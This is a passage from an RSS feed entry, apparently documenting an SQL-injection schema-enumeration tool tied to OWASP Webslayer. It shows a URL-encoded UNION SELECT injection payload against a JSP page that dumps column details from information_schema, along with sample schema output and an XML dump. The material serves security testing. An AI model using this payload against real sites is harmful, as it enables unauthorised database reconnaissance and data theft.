VULNERABLE LINK     :   http://midominio.com.mx/miaplicacion&lt;br /&gt;/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+&lt;br /&gt;SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28&lt;br /&gt;COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e&lt;br /&gt;%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+&lt;br /&gt;table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+ &lt;br /&gt;
------------------------------------------------&lt;br /&gt;
SCHEMA seguridad&lt;br /&gt;
------------------------------------------------&lt;br /&gt;
VERSION : 5.5.16&lt;br /&gt;
DATADIR : &lt;br /&gt;
&lt;br /&gt;
TABLE cuentas&lt;br /&gt;
---------------------&lt;br /&gt;
type        :   BASE TABLE&lt;br /&gt;
engine      :   InnoDB&lt;br /&gt;
collation       :   latin1_swedish_ci&lt;br /&gt;
increment   :   1&lt;br /&gt;
&lt;br /&gt;
COLUMNS&lt;br /&gt;
---------------------&lt;br /&gt;
NAME        :   cid&lt;br /&gt;
        type        int(11)&lt;br /&gt;
        key     0&lt;br /&gt;
        extra       0&lt;br /&gt;
NAME        :   username&lt;br /&gt;
…&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;index.php_db_schemas.xml file example:&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
&amp;lt;schemas&gt;&lt;br /&gt;
&amp;lt;database name="owasp10" version="5.5.16" datadir=""&gt;&lt;br /&gt;
&amp;lt;tables&gt;&lt;br /&gt;
&amp;lt;table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1"&gt;&lt;br /&gt;
&amp;lt;column name="cid"&gt;&amp;lt;type&gt;int(11)&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
&amp;lt;column name="username"&gt;&amp;lt;type&gt;text&amp;lt;/type&gt;&amp;lt;key&gt;0&amp;lt;/key&gt;&amp;lt;extra&gt;0&amp;lt;/extra&gt;&amp;lt;/column&gt;&lt;br /&gt;
…&lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;!-- **********************  RESOURCES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Resources:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Link:&lt;/b&gt; &lt;a href="https://www.owasp.org/index.php/Category:OWASP_Webslayer_Project." rel="nofollow"&gt;https://www.owasp.org/index.php/Category:OWASP_Webslayer_Project.&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Author(s):&lt;/b&gt; Christian Martorella&lt;br /&gt;
&lt;b&gt;Contact:&lt;/b&gt; owasp-Webslayer-project [at] lists.owasp.org&lt;br /&gt;
&lt;b&gt;License:&lt;/b&gt; GPL v 2.0.&lt;/p&gt;&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Thu, 12 Dec 2013 19:33:07 -0000</pubDate><guid>https://sourceforge.neta1ee819602b031785dd02d6a693a4caa37d50081</guid></item></channel></rss>